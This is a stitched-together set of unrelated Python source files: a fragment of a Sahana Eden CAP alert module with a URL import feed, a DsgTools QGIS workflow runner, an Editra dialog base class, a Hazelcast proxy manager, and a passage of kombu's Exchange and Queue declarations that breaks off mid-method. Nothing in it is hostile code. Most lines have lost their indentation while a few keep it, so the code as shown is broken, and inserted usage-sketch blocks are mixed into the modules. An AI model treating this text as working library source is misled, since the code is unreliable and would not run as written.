# If there is a cap_circle tag, we don't need to do anything further, as
# export.xsl will use it. However, we don't know if there is a cap_circle
# tag...
#
# @ToDo: The export calls xml_post_render after processing a resource's
# fields, but before its components are added as children in the xml tree.
# If this were delayed til after the components were added, we could look
# there for the cap_circle gis_location_tag record. Since xml_post_parse
# isn't in use yet (except for this), maybe we could look at moving it til
# after the components?
#
# For now, with the xml_post_render before components: We could do a db
# query to check for a real cap_circle tag record, and not bother with
# creating fallbacks from bounding box or point...but we don't have to.
# Instead, just go ahead and add the fallbacks under different tag names,
# and let the export.xsl sort them out. This only wastes a little time
# compared to a db query.
# ToDo: MULTIPOLYGON -- Can stitch together the outer polygons in the
# multipolygon, but would need to assure all were the same handedness.
# The remaining cases are for locations that don't have either polygon wkt
# or a cap_circle tag.
# Bounding box: Make a four-vertex polygon from the bounding box.
# This is a fallback, as if there is a circle tag, we'll use that.
lon_min = record.get("lon_min", None)
lon_max = record.get("lon_max", None)
lat_min = record.get("lat_min", None)
lat_max = record.get("lat_max", None)
if lon_min and lon_max and lat_min and lat_max and \
(lon_min != lon_max) and (lat_min != lat_max):
# Although there is no WKT requirement, arrange the points in
# counterclockwise order. Recall format is:
# lat1,lon1 lat2,lon2 ... latN,lonN, lat1,lon1
cap_polygon_text = \
"%(lat_min)s,%(lon_min)s %(lat_min)s,%(lon_max)s %(lat_max)s,%(lon_max)s %(lat_max)s,%(lon_min)s %(lat_min)s,%(lon_min)s" \
% {"lon_min": lon_min,
"lon_max": lon_max,
"lat_min": lat_min,
"lat_max": lat_max}
__cap_gis_location_add_polygon(element, cap_polygon_text, fallback=True)
return
# WKT POINT or location with lat, lon: This can be rendered as a
# zero-radius circle.
# Q: Do we put bounding boxes around POINT locations, and are they
# meaningful?
lat = record.get("lat", None)
lon = record.get("lon", None)
if not lat or not lon:
# Look for POINT.
if wkt and wkt.startswith("POINT"):
start = wkt.find("(")
end = wkt.find(")")
if start >=0 and end >=0:
                # start + 1 plus strip() handles both "POINT(lon lat)" and "POINT ( lon lat )"
                point_text = wkt[start + 1 : end].strip()
point = point_text.split()
try:
lon = float(point[0])
lat = float(point[1])
except ValueError:
pass
if lat and lon:
# Add a (fallback) circle with zero radius.
__cap_gis_location_add_circle(element, lat, lon, 0, True)
return
# ToDo: Other WKT.
# Did not find anything to use. Presumably the area has a text description.
return
# -----------------------------------------------------------------------------
class CAPImportFeed(S3Method):
"""
Import CAP alerts from a URL
"""
# -------------------------------------------------------------------------
@staticmethod
def apply_method(r, **attr):
"""
Apply method.
@param r: the S3Request
@param attr: controller options for this request
"""
if r.representation == "html":
T = current.T
request = current.request
response = current.response
title = T("Import from Feed URL")
# @ToDo: use Formstyle
form = FORM(
TABLE(
TR(TD(DIV(B("%s:" % T("URL")),
SPAN(" *", _class="req"))),
TD(INPUT(_type="text", _name="url",
_id="url", _value="")),
TD(),
),
TR(TD(B("%s: " % T("User"))),
TD(INPUT(_type="text", _name="user",
_id="user", _value="")),
TD(),
),
TR(TD(B("%s: " % T("Password"))),
TD(INPUT(_type="text", _name="password",
_id="password", _value="")),
TD(),
),
TR(TD(B("%s: " % T("Ignore Errors?"))),
TD(INPUT(_type="checkbox", _name="ignore_errors",
_id="ignore_errors")),
TD(),
),
TR(TD(),
TD(INPUT(_type="submit", _value=T("Import"))),
TD(),
)
)
)
response.view = "create.html"
output = dict(title=title,
form=form)
if form.accepts(request.vars, current.session):
form_vars = form.vars
url = form_vars.get("url", None)
if not url:
response.error = T("URL is required")
return output
# @ToDo:
                username = form_vars.get("user", None)
password = form_vars.get("password", None)
try:
file = fetch(url)
except urllib2.URLError:
response.error = str(sys.exc_info()[1])
return output
except urllib2.HTTPError:
response.error = str(sys.exc_info()[1])
return output
File = StringIO(file)
stylesheet = os.path.join(request.folder, "static", "formats",
"cap", "import.xsl")
xml = current.xml
tree = xml.parse(File)
resource = current.s3db.resource("cap_alert")
s3xml = xml.transform(tree, stylesheet_path=stylesheet,
name=resource.name)
try:
resource.import_xml(s3xml,
ignore_errors=form_vars.get("ignore_errors", None))
except:
response.error = str(sys.exc_info()[1])
else:
import_count = resource.import_count
if import_count:
response.confirmation = "%s %s" % \
(import_count,
T("Alerts successfully imported."))
else:
response.information = T("No Alerts available.")
return output
else:
raise HTTP(501, current.ERROR.BAD_METHOD)
# END =========================================================================
|
# -*- coding: utf-8 -*-
"""
/***************************************************************************
DsgTools
A QGIS plugin
Brazilian Army Cartographic Production Tools
-------------------
begin : 2019-08-28
git sha : $Format:%H$
copyright : (C) 2019 by João P. Esperidião - Cartographic Engineer @ Brazilian Army
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
import os, json
from time import sleep, time
from functools import partial
from qgis.core import (QgsApplication,
QgsProcessingFeedback,
QgsProcessingMultiStepFeedback)
from qgis.PyQt.QtCore import QObject, pyqtSignal
from DsgTools.core.DSGToolsProcessingAlgs.Models.dsgToolsProcessingModel import DsgToolsProcessingModel
class QualityAssuranceWorkflow(QObject):
"""
Works as a multi-model runner. Understands all models' parameters as an
output vector layer.
"""
workflowFinished = pyqtSignal()
haltedOnFlags = pyqtSignal(DsgToolsProcessingModel)
modelStarted = pyqtSignal(DsgToolsProcessingModel)
modelFinished = pyqtSignal(DsgToolsProcessingModel)
modelFinishedWithFlags = pyqtSignal(DsgToolsProcessingModel)
modelFailed = pyqtSignal(DsgToolsProcessingModel)
def __init__(self, parameters, feedback=None):
"""
        Class constructor. Materializes a workflow's set of parameters.
:param parameters: (dict) map of workflow attributes.
:param feedback: (QgsProcessingFeedback) task progress tracking QGIS
object.
"""
super(QualityAssuranceWorkflow, self).__init__()
msg = self.validateParameters(parameters)
if msg:
raise Exception(
self.tr("Invalid workflow parameter:\n{msg}").format(msg=msg)
)
self._param = parameters
self._modelOrderMap = dict()
self.output = dict()
self.feedback = feedback or QgsProcessingFeedback()
def validateParameters(self, parameters):
"""
Validates a set of parameters for a valid Workflow.
:param parameters: (dict) map of workflow attributes to be validated.
:return: (str) invalidation reason.
"""
if "displayName" not in parameters or not parameters["displayName"]:
# this is not a mandatory item, but it defaults to a value
parameters["displayName"] = self.tr("DSGTools Validation Workflow")
if "models" not in parameters or not parameters["models"]:
return self.tr("Workflow seems to have no models associated with it.")
for modelName, modelParam in parameters["models"].items():
model=DsgToolsProcessingModel(modelParam, modelName)
if not model.isValid():
return self.tr("Model {model} is invalid: '{reason}'.").format(
model=modelName, reason=model.validateParameters(modelParam)
)
# if "flagLayer" not in parameters or not parameters["flagLayer"]:
# self.tr("No flag layer was provided.")
# if "historyLayer" not in parameters or not parameters["historyLayer"]:
# self.tr("No history layer was provided.")
return ""
def metadata(self):
"""
A map to Workflow's metadata.
:return: (dict) metadata.
"""
return self._param["metadata"] if "metadata" in self._param else dict()
def author(self):
"""
Retrieves Workflow's author, if available.
:return: (str) Workflow's author.
"""
meta = self.metadata()
return meta["author"] if "author" in meta else ""
def version(self):
"""
Retrieves Workflow's version, if available.
:return: (str) Workflow's version.
"""
meta = self.metadata()
return meta["version"] if "version" in meta else ""
def lastModified(self):
"""
Retrieves Workflow's last modification "timestamp", if available.
:return: (str) Workflow's last modification time and date.
"""
meta = self.metadata()
return meta["lastModified"] if "lastModified" in meta else ""
def metadataText(self):
"""
Retrieves Workflow's metadata string.
:return: (str) Workflow's metadata string.
"""
if not self.metadata():
return ""
return self.tr(
"Workflow {name} v{version} ({lastModified}) by {author}."
).format(name=self.displayName(), **self.metadata())
def displayName(self):
"""
Friendly name for the workflow.
:return: (str) display name.
"""
return self._param["displayName"] if \
"displayName" in self._param else ""
def name(self):
"""
Proxy method for displayName.
:return: (str) display name.
"""
return self.displayName()
def models(self):
"""
Model parameters defined to run in this workflow.
:return: (dict) models maps to valid and invalid models.
"""
models = {"valid" : dict(), "invalid" : dict()}
self._multiStepFeedback = QgsProcessingMultiStepFeedback(
len(self._param["models"]), self.feedback
)
self._multiStepFeedback.setCurrentStep(0)
for modelName, modelParam in self._param["models"].items():
model = DsgToolsProcessingModel(
modelParam, modelName, feedback=self._multiStepFeedback
)
if not model.isValid():
models["invalid"][modelName] = model.validateParameters(modelParam)
else:
models["valid"][modelName] = model
return models
def validModels(self):
"""
Returns all valid models from workflow parameters.
:return: (dict) models maps to valid and invalid models.
"""
models = dict()
self._multiStepFeedback = QgsProcessingMultiStepFeedback(
len(self._param["models"]), self.feedback
)
self._multiStepFeedback.setCurrentStep(0)
for idx, (modelName, modelParam) in enumerate(self._param["models"].items()):
model = DsgToolsProcessingModel(
modelParam, modelName, feedback=self._multiStepFeedback
)
if model.isValid():
models[modelName] = model
self._modelOrderMap[modelName] = idx
return models
def invalidModels(self):
"""
        Returns all invalid models from workflow parameters.
:return: (dict) models maps invalid models to their invalidation reason.
"""
models = dict()
self._multiStepFeedback = QgsProcessingMultiStepFeedback(
len(self._param["models"]), self.feedback
)
self._multiStepFeedback.setCurrentStep(0)
for modelName, modelParam in self._param["models"].items():
model = DsgToolsProcessingModel(
modelParam, modelName, feedback=self._multiStepFeedback
)
if not model.isValid():
models[modelName] = model.validateParameters(modelParam)
return models
def hasInvalidModel(self):
"""
Checks if any of the nested models is invalid.
:return: (bool) if there are invalid models.
"""
models = dict()
for modelName, modelParam in self._param["models"].items():
model = DsgToolsProcessingModel(modelParam, modelName)
if not model.isValid():
return True
return False
# def flagLayer(self):
# """
# Layer to work as a sink to flag output for all models.
# :return: (QgsVectorLayer) flag layer.
# """
# return self._param["flagLayer"] if "flagLayer" in self._param else ""
# def historyLayer(self):
# """
# A table (a layer with no geometry) to store execution history.
# :return: (QgsVectorLayer) flag layer.
# """
# return self._param["flagLayer"] if "flagLayer" in self._param else ""
def export(self, filepath):
"""
Dumps workflow's parameters as a JSON file.
:param filepath: (str) path to JSON file.
:return: (bool) operation success.
"""
with open(filepath, "w", encoding="utf-8") as fp:
fp.write(json.dumps(self._param, indent=4))
return os.path.exists(filepath)
def asDict(self):
"""
        Exposes the workflow's parameters as a plain dict.
        :return: (dict) DSGTools processing model definitions.
"""
return dict(self._param)
def finished(self):
"""
Executes all post-processing actions.
"""
# Add default post-processing actions here!
self.workflowFinished.emit()
def runOnMainThread(self):
"""
If, for some reason, Workflow should not be run from secondary threads,
this method provides a 'static' execution alternative.
:return: (dict) a map to each model's output.
"""
self.output = dict()
for model in self.validModels().values():
start = time()
mName = model.name()
self.output[mName] = dict()
try:
self.output[mName]["result"] = {
k.split(":", 2)[-1] : v \
for k, v in model.runModel(model.feedback).items()
}
self.output[mName]["status"] = True
except:
self.output[mName]["result"] = None
self.output[mName]["status"] = False
self.output[mName]["executionTime"] = time() - start
self.finished()
return self.output
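    # Each self.output entry maps a model name to
    # {"result": {outputName: value} or None, "status": bool, "executionTime": seconds}.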
def setupModelTask(self, model):
"""
Sets model to run on QGIS task manager.
"""
QgsApplication.taskManager().addTask(model)
def hold(self):
"""
Puts current active tasks/models on hold.
"""
if not hasattr(self, "_executionOrder"):
return
for m in self._executionOrder.values():
if m.status() == m.Running:
m.hold()
def unhold(self):
"""
Puts current paused tasks/models back to active status.
"""
if not hasattr(self, "_executionOrder"):
return
for m in self._executionOrder.values():
if m.status() == m.OnHold:
m.unhold()
def currentModel(self):
"""
Retrieves the model currently running, if any.
:return: (DsgToolsProcessingModel) current active model.
"""
if not hasattr(self, "_executionOrder"):
return None
for m in self._executionOrder.values():
if m.status() == m.Running:
return m
return None
def raiseFlagWarning(self, model):
"""
        Advises connected objects that flags were raised even though workflow
        execution continues.
:param model: (DsgToolsProcessingModel) model to have its flags checked.
"""
if model.hasFlags():
self.modelFinishedWithFlags.emit(model)
else:
self.modelFinished.emit(model)
def raiseFlagError(self, model):
"""
It stops the workflow execution if flags are identified.
:param model: (DsgToolsProcessingModel) model to have its flags checked.
"""
if model.hasFlags():
self.feedback.cancel()
self.haltedOnFlags.emit(model)
else:
self.modelFinished.emit(model)
return self.feedback.isCanceled()
def handleFlags(self, model):
"""
Handles Workflow behaviour for a model's flag output.
:param model: (DsgToolsProcessingModel) model to have its output handled.
"""
onFlagsMethod = {
"warn" : partial(self.raiseFlagWarning, model),
"halt" : partial(self.raiseFlagError, model),
"ignore" : partial(self.modelFinished.emit, model)
}[model.onFlagsRaised()]()
def run(self, firstModelName=None, cooldown=None):
"""
Executes all models in secondary threads.
:param firstModelName: (str) first model's name to be executed.
:param cooldown: (float) time to wait till next model is started.
"""
self._executionOrder = {
idx: model for idx, model in enumerate(self.validModels().values())
}
modelCount = len(self._executionOrder)
if self.hasInvalidModel() or modelCount == 0:
return None
def modelCompleted(model, step):
self.output[model.name()] = model.output
self._multiStepFeedback.setCurrentStep(step)
self.handleFlags(model)
if firstModelName is not None:
for idx, model in self._executionOrder.items():
if model.name() == firstModelName:
initialIdx = idx
break
else:
# name was not found
return None
else:
initialIdx = 0
self.output = dict()
for idx, currentModel in self._executionOrder.items():
if idx < initialIdx:
continue
# all models MUST pass through this postprocessing method
currentModel.taskCompleted.connect(
partial(modelCompleted, currentModel, idx + 1)
)
currentModel.begun.connect(
partial(self.modelStarted.emit, currentModel)
)
currentModel.taskTerminated.connect(
partial(self.modelFailed.emit, currentModel)
)
if idx != modelCount - 1:
self._executionOrder[idx + 1].addSubTask(
currentModel,
subTaskDependency=currentModel.ParentDependsOnSubTask
)
else:
# last model indicates workflow finish
currentModel.taskCompleted.connect(self.finished)
# last model will trigger every dependent model till the first added to
# the task manager
self.setupModelTask(currentModel)
def lastModelName(self):
"""
        Gets the name of the first model that was prepared to execute but
        either failed or did not run.
        :return: (str) name of the first model that did not finish, or None if
                 all models finished.
"""
if not hasattr(self, "_executionOrder"):
return None
modelCount = len(self._executionOrder)
for idx, model in self._executionOrder.items():
modelName = self._executionOrder[idx].displayName()
if modelName not in self.output or \
self.output[modelName]["finishStatus"] != "finished":
return modelName
else:
return None
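# --- Illustrative usage sketch (added for clarity; not part of the original module). ---
# `workflow` is assumed to be an instance of the class above, already built from a
# parameter dict containing a "models" mapping; the export path is hypothetical.
def _workflow_usage_sketch(workflow):
    """Run every valid model on the main thread and dump the parameters to disk."""
    if workflow.hasInvalidModel():
        return workflow.invalidModels()      # {modelName: invalidation reason}
    output = workflow.runOnMainThread()      # {modelName: {"result", "status", "executionTime"}}
    workflow.export("/tmp/workflow.json")    # persist the parameter dict as JSON
    return output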
|
###############################################################################
# Name: ecbasewin.py #
# Purpose: Eclib Base Window Classes #
# Author: Cody Precord <[email protected]> #
# Copyright: (c) 2009 Cody Precord <[email protected]> #
# License: wxWindows License #
###############################################################################
"""
Editra Control Library: Base Window Classes
"""
__author__ = "Cody Precord <[email protected]>"
__svnid__ = "$Id: ecbasewin.py 69410 2011-10-13 14:20:12Z CJP $"
__revision__ = "$Revision: 69410 $"
__all__ = ["ECBaseDlg", "expose"]
#-----------------------------------------------------------------------------#
# Imports
import wx
#-----------------------------------------------------------------------------#
# Decorators
class expose(object):
"""Expose a panels method to a to a specified class
The specified class must have a GetPanel method
"""
def __init__(self, cls):
"""@param cls: class to expose the method to"""
super(expose, self).__init__()
self.cls = cls
def __call__(self, funct):
fname = funct.func_name
def parentmeth(*args, **kwargs):
self = args[0]
return getattr(self.GetPanel(), fname)(*args[1:], **kwargs)
parentmeth.__name__ = funct.__name__
parentmeth.__doc__ = funct.__doc__
setattr(self.cls, fname, parentmeth)
return funct
#-----------------------------------------------------------------------------#
class ECBaseDlg(wx.Dialog):
"""Editra Control Library Base Dialog Class"""
def __init__(self, parent, id=wx.ID_ANY, title=u"",
pos=wx.DefaultPosition, size=wx.DefaultSize,
style=wx.DEFAULT_DIALOG_STYLE, name=u"ECBaseDialog"):
super(ECBaseDlg, self).__init__(parent, id, title, pos,
size, style, name)
# Attributes
self._panel = None
# Setup
self.SetSizer(wx.BoxSizer(wx.VERTICAL))
Panel = property(lambda self: self.GetPanel(),
lambda self, val: self.SetPanel(val))
def GetPanel(self):
"""Get the dialogs main panel"""
return self._panel
def SetPanel(self, panel):
"""Set the dialogs main panel"""
assert isinstance(panel, wx.Panel)
if self._panel is not None:
self._panel.Destroy()
self._panel = panel
self.Sizer.Add(self._panel, 1, wx.EXPAND)
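#-----------------------------------------------------------------------------#
# Illustrative usage sketch (added for clarity; not part of the original module).
# A panel publishes one of its methods on its owning dialog through `expose`, so
# callers only ever talk to the dialog. The class and method names below are
# hypothetical.
class _ExampleDialog(ECBaseDlg):
    """Dialog whose behaviour is delegated to its panel"""
    def __init__(self, parent):
        super(_ExampleDialog, self).__init__(parent, title=u"Example")
        self.SetPanel(_ExamplePanel(self))
class _ExamplePanel(wx.Panel):
    """Panel that exposes GetValue on _ExampleDialog"""
    @expose(_ExampleDialog)
    def GetValue(self):
        """Forwarded from the dialog to this panel at call time"""
        return 42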
|
from hazelcast.protocol.codec import client_create_proxy_codec, client_destroy_proxy_codec
from hazelcast.proxy.atomic_long import AtomicLong
from hazelcast.proxy.atomic_reference import AtomicReference
from hazelcast.proxy.count_down_latch import CountDownLatch
from hazelcast.proxy.executor import Executor
from hazelcast.proxy.id_generator import IdGenerator
from hazelcast.proxy.list import List
from hazelcast.proxy.lock import Lock
from hazelcast.proxy.map import create_map_proxy
from hazelcast.proxy.multi_map import MultiMap
from hazelcast.proxy.queue import Queue
from hazelcast.proxy.reliable_topic import ReliableTopic
from hazelcast.proxy.replicated_map import ReplicatedMap
from hazelcast.proxy.ringbuffer import Ringbuffer
from hazelcast.proxy.semaphore import Semaphore
from hazelcast.proxy.set import Set
from hazelcast.proxy.topic import Topic
ATOMIC_LONG_SERVICE = "hz:impl:atomicLongService"
ATOMIC_REFERENCE_SERVICE = "hz:impl:atomicReferenceService"
COUNT_DOWN_LATCH_SERVICE = "hz:impl:countDownLatchService"
ID_GENERATOR_SERVICE = "hz:impl:idGeneratorService"
EXECUTOR_SERVICE = "hz:impl:executorService"
LOCK_SERVICE = "hz:impl:lockService"
LIST_SERVICE = "hz:impl:listService"
MULTI_MAP_SERVICE = "hz:impl:multiMapService"
MAP_SERVICE = "hz:impl:mapService"
RELIABLE_TOPIC_SERVICE = "hz:impl:reliableTopicService"
REPLICATED_MAP_SERVICE = "hz:impl:replicatedMapService"
RINGBUFFER_SERIVCE = "hz:impl:ringbufferService"
SEMAPHORE_SERVICE = "hz:impl:semaphoreService"
SET_SERVICE = "hz:impl:setService"
QUEUE_SERVICE = "hz:impl:queueService"
TOPIC_SERVICE = "hz:impl:topicService"
ID_GENERATOR_ATOMIC_LONG_PREFIX = "hz:atomic:idGenerator:"
_proxy_init = {
ATOMIC_LONG_SERVICE: AtomicLong,
ATOMIC_REFERENCE_SERVICE: AtomicReference,
COUNT_DOWN_LATCH_SERVICE: CountDownLatch,
ID_GENERATOR_SERVICE: IdGenerator,
EXECUTOR_SERVICE: Executor,
LIST_SERVICE: List,
LOCK_SERVICE: Lock,
MAP_SERVICE: create_map_proxy,
MULTI_MAP_SERVICE: MultiMap,
QUEUE_SERVICE: Queue,
RELIABLE_TOPIC_SERVICE: ReliableTopic,
REPLICATED_MAP_SERVICE: ReplicatedMap,
RINGBUFFER_SERIVCE: Ringbuffer,
SEMAPHORE_SERVICE: Semaphore,
SET_SERVICE: Set,
TOPIC_SERVICE: Topic
}
class ProxyManager(object):
def __init__(self, client):
self._client = client
self._proxies = {}
def get_or_create(self, service_name, name, **kwargs):
ns = (service_name, name)
if ns in self._proxies:
return self._proxies[ns]
proxy = self.create_proxy(service_name, name, **kwargs)
self._proxies[ns] = proxy
return proxy
def create_proxy(self, service_name, name, **kwargs):
message = client_create_proxy_codec.encode_request(name=name, service_name=service_name,
target=self._find_next_proxy_address())
self._client.invoker.invoke_on_random_target(message).result()
return _proxy_init[service_name](client=self._client, service_name=service_name, name=name, **kwargs)
def destroy_proxy(self, service_name, name):
ns = (service_name, name)
try:
self._proxies.pop(ns)
message = client_destroy_proxy_codec.encode_request(name=name, service_name=service_name)
self._client.invoker.invoke_on_random_target(message).result()
return True
except KeyError:
return False
def _find_next_proxy_address(self):
# TODO: filter out lite members
return self._client.load_balancer.next_address()
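# --- Illustrative usage sketch (added for clarity; not part of the original module). ---
# `proxy_manager` is assumed to be the ProxyManager owned by a connected client;
# the map name is hypothetical.
def _proxy_manager_usage_sketch(proxy_manager):
    """Fetch (or lazily create) a distributed map proxy, then destroy it."""
    distributed_map = proxy_manager.get_or_create(MAP_SERVICE, "my-distributed-map")
    # ... use the proxy here (available operations depend on the concrete proxy type) ...
    destroyed = proxy_manager.destroy_proxy(MAP_SERVICE, "my-distributed-map")
    return destroyed  # True if the proxy existed locally and was destroyed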
|
"""
kombu.entity
================
Exchange and Queue declarations.
:copyright: (c) 2009 - 2011 by Ask Solem.
:license: BSD, see LICENSE for more details.
"""
from kombu.abstract import MaybeChannelBound
from kombu.syn import blocking as _SYN
TRANSIENT_DELIVERY_MODE = 1
PERSISTENT_DELIVERY_MODE = 2
DELIVERY_MODES = {"transient": TRANSIENT_DELIVERY_MODE,
"persistent": PERSISTENT_DELIVERY_MODE}
class Exchange(MaybeChannelBound):
"""An Exchange declaration.
:keyword name: See :attr:`name`.
:keyword type: See :attr:`type`.
:keyword channel: See :attr:`channel`.
:keyword durable: See :attr:`durable`.
:keyword auto_delete: See :attr:`auto_delete`.
:keyword delivery_mode: See :attr:`delivery_mode`.
:keyword arguments: See :attr:`arguments`.
.. attribute:: name
Name of the exchange. Default is no name (the default exchange).
.. attribute:: type
AMQP defines four default exchange types (routing algorithms) that
covers most of the common messaging use cases. An AMQP broker can
also define additional exchange types, so see your broker
manual for more information about available exchange types.
* `direct` (*default*)
Direct match between the routing key in the message, and the
routing criteria used when a queue is bound to this exchange.
* `topic`
Wildcard match between the routing key and the routing pattern
specified in the exchange/queue binding. The routing key is
treated as zero or more words delimited by `"."` and
supports special wildcard characters. `"*"` matches a
single word and `"#"` matches zero or more words.
* `fanout`
Queues are bound to this exchange with no arguments. Hence any
message sent to this exchange will be forwarded to all queues
bound to this exchange.
* `headers`
Queues are bound to this exchange with a table of arguments
containing headers and values (optional). A special argument
named "x-match" determines the matching algorithm, where
`"all"` implies an `AND` (all pairs must match) and
`"any"` implies `OR` (at least one pair must match).
:attr:`arguments` is used to specify the arguments.
This description of AMQP exchange types was shamelessly stolen
from the blog post `AMQP in 10 minutes: Part 4`_ by
Rajith Attapattu. This article is recommended reading.
.. _`AMQP in 10 minutes: Part 4`:
http://bit.ly/amqp-exchange-types
.. attribute:: channel
The channel the exchange is bound to (if bound).
.. attribute:: durable
Durable exchanges remain active when a server restarts. Non-durable
exchanges (transient exchanges) are purged when a server restarts.
Default is :const:`True`.
.. attribute:: auto_delete
If set, the exchange is deleted when all queues have finished
using it. Default is :const:`False`.
.. attribute:: delivery_mode
The default delivery mode used for messages. The value is an integer,
or alias string.
* 1 or `"transient"`
The message is transient. Which means it is stored in
memory only, and is lost if the server dies or restarts.
* 2 or "persistent" (*default*)
The message is persistent. Which means the message is
stored both in-memory, and on disk, and therefore
preserved if the server dies or restarts.
The default value is 2 (persistent).
.. attribute:: arguments
Additional arguments to specify when the exchange is declared.
"""
TRANSIENT_DELIVERY_MODE = TRANSIENT_DELIVERY_MODE
PERSISTENT_DELIVERY_MODE = PERSISTENT_DELIVERY_MODE
name = ""
type = "direct"
durable = True
auto_delete = False
delivery_mode = PERSISTENT_DELIVERY_MODE
attrs = (("name", None),
("type", None),
("arguments", None),
("durable", bool),
("auto_delete", bool),
("delivery_mode", lambda m: DELIVERY_MODES.get(m) or m))
def __init__(self, name="", type="", channel=None, **kwargs):
super(Exchange, self).__init__(**kwargs)
self.name = name or self.name
self.type = type or self.type
self.maybe_bind(channel)
def declare(self, nowait=False):
"""Declare the exchange.
Creates the exchange on the broker.
:keyword nowait: If set the server will not respond, and a
response will not be waited for. Default is :const:`False`.
"""
return _SYN(self.channel.exchange_declare, exchange=self.name,
type=self.type,
durable=self.durable,
auto_delete=self.auto_delete,
arguments=self.arguments,
nowait=nowait)
def Message(self, body, delivery_mode=None, priority=None,
content_type=None, content_encoding=None, properties=None,
headers=None):
"""Create message instance to be sent with :meth:`publish`.
:param body: Message body.
:keyword delivery_mode: Set custom delivery mode. Defaults
to :attr:`delivery_mode`.
:keyword priority: Message priority, 0 to 9. (currently not
supported by RabbitMQ).
:keyword content_type: The messages content_type. If content_type
is set, no serialization occurs as it is assumed this is either
a binary object, or you've done your own serialization.
Leave blank if using built-in serialization as our library
properly sets content_type.
:keyword content_encoding: The character set in which this object
is encoded. Use "binary" if sending in raw binary objects.
Leave blank if using built-in serialization as our library
properly sets content_encoding.
:keyword properties: Message properties.
:keyword headers: Message headers.
"""
properties = properties or {}
delivery_mode = delivery_mode or self.delivery_mode
properties["delivery_mode"] = DELIVERY_MODES.get(delivery_mode,
delivery_mode)
return self.channel.prepare_message(body,
properties=properties,
priority=priority,
content_type=content_type,
content_encoding=content_encoding,
headers=headers)
def publish(self, message, routing_key=None, mandatory=False,
immediate=False, exchange=None):
"""Publish message.
:param message: :meth:`Message` instance to publish.
:param routing_key: Routing key.
:param mandatory: Currently not supported.
:param immediate: Currently not supported.
"""
exchange = exchange or self.name
return self.channel.basic_publish(message,
exchange=exchange,
routing_key=routing_key,
mandatory=mandatory,
immediate=immediate)
def delete(self, if_unused=False, nowait=False):
"""Delete the exchange declaration on server.
:keyword if_unused: Delete only if the exchange has no bindings.
Default is :const:`False`.
:keyword nowait: If set the server will not respond, and a
response will not be waited for. Default is :const:`False`.
"""
return _SYN(self.channel.exchange_delete, exchange=self.name,
if_unused=if_unused,
nowait=nowait)
def __eq__(self, other):
if isinstance(other, Exchange):
return (self.name == other.name and
self.type == other.type and
self.arguments == other.arguments and
self.durable == other.durable and
self.auto_delete == other.auto_delete and
self.delivery_mode == other.delivery_mode)
return False
def __repr__(self):
return super(Exchange, self).__repr__("Exchange %s(%s)" % (self.name,
self.type))
class Queue(MaybeChannelBound):
"""A Queue declaration.
:keyword name: See :attr:`name`.
:keyword exchange: See :attr:`exchange`.
:keyword routing_key: See :attr:`routing_key`.
:keyword channel: See :attr:`channel`.
:keyword durable: See :attr:`durable`.
:keyword exclusive: See :attr:`exclusive`.
:keyword auto_delete: See :attr:`auto_delete`.
:keyword queue_arguments: See :attr:`queue_arguments`.
:keyword binding_arguments: See :attr:`binding_arguments`.
.. attribute:: name
Name of the queue. Default is no name (default queue destination).
.. attribute:: exchange
The :class:`Exchange` the queue binds to.
.. attribute:: routing_key
The routing key (if any), also called *binding key*.
The interpretation of the routing key depends on
the :attr:`Exchange.type`.
* direct exchange
Matches if the routing key property of the message and
the :attr:`routing_key` attribute are identical.
* fanout exchange
Always matches, even if the binding does not have a key.
* topic exchange
Matches the routing key property of the message by a primitive
pattern matching scheme. The message routing key then consists
of words separated by dots (`"."`, like domain names), and
two special characters are available; star (`"*"`) and hash
(`"#"`). The star matches any word, and the hash matches
zero or more words. For example `"*.stock.#"` matches the
routing keys `"usd.stock"` and `"eur.stock.db"` but not
`"stock.nasdaq"`.
.. attribute:: channel
The channel the Queue is bound to (if bound).
.. attribute:: durable
Durable queues remain active when a server restarts.
Non-durable queues (transient queues) are purged if/when
a server restarts.
Note that durable queues do not necessarily hold persistent
messages, although it does not make sense to send
persistent messages to a transient queue.
Default is :const:`True`.
.. attribute:: exclusive
Exclusive queues may only be consumed from by the
current connection. Setting the 'exclusive' flag
always implies 'auto-delete'.
Default is :const:`False`.
.. attribute:: auto_delete
If set, the queue is deleted when all consumers have
finished using it. Last consumer can be cancelled
either explicitly or because its channel is closed. If
there was no consumer ever on the queue, it won't be
deleted.
.. attribute:: queue_arguments
Additional arguments used when declaring the queue.
.. attribute:: binding_arguments
Additional arguments used when binding the queue.
"""
name = ""
exchange = None
routing_key = ""
durable = True
exclusive = False
auto_delete = False
attrs = (("name", None),
("exchange", None),
("routing_key", None),
("queue_arguments", None),
("binding_arguments", None),
("durable", bool),
("exclusive", bool),
("auto_delete", bool))
def __init__(self, name="", exchange=None, routing_key="", channel=None,
**kwargs):
super(Queue, self).__init__(**kwargs)
self.name = name or self.name
self.exchange = exchange or self.exchange
self.routing_key = routing_key or self.routing_key
# exclusive implies auto-delete.
if self.exclusive:
self.auto_delete = True
self.maybe_bind(channel)
def when_bound(self):
self.exchange = self.exchange(self.channel)
def declare(self, nowait=False):
"""Declares the queue, the exchange and binds the queue to
the exchange."""
return (self.name and self.exchange.declare(nowait),
self.name and self.queue_declare(nowait, passive=False),
self.name and self.queue_bind(nowait))
def queue_declare(self, nowait=False, passive=False):
"""Declare queue on the server.
:keyword nowait: Do not wait for a reply.
:keyword passive: If set, the server will not create the queue.
The client can use this to check whether a queue exists
without modifying the server state.
"""
return _SYN(self.channel.queue_declare, queue=self.name,
passive=passive,
durable=self.durable,
exclusive=self.exclusive,
auto_delete=self.auto_delete,
arguments=self.queue_arguments,
nowait=nowait)
def queue_bind(self, nowait=False):
"""Create the queue binding on the server.
:keyword nowait: Do not wait for a reply.
"""
return _SYN(self.channel.queue_bind, queue=self.name,
exchange=self.exchange.name,
routing_key=self.routing_key,
arguments=self.binding_arguments,
nowait=nowait)
def get(self, no_ack=None):
"""Poll the server for a new message.
Returns the message instance if a message was available,
or :const:`None` otherwise.
        :keyword no_ack: If set, received messages do not have to be
            acknowledged.
This method provides direct access to the messages in a
queue using a synchronous dialogue, designed for
specific types of applications where synchronous functionality
is more important than performance.
"""
message = _SYN(self.channel.basic_get, queue=self.name, no_ack=no_ack)
if message is not None:
return self.channel.message_to_python(message)
def purge(self, nowait=False):
"""Remove all messages from the queue."""
return _SYN(self.channel.queue_purge, queue=self.name,
nowait=nowait) or 0
def consume(self, consumer_tag='', callback=None, no_ack=None,
nowait=False):
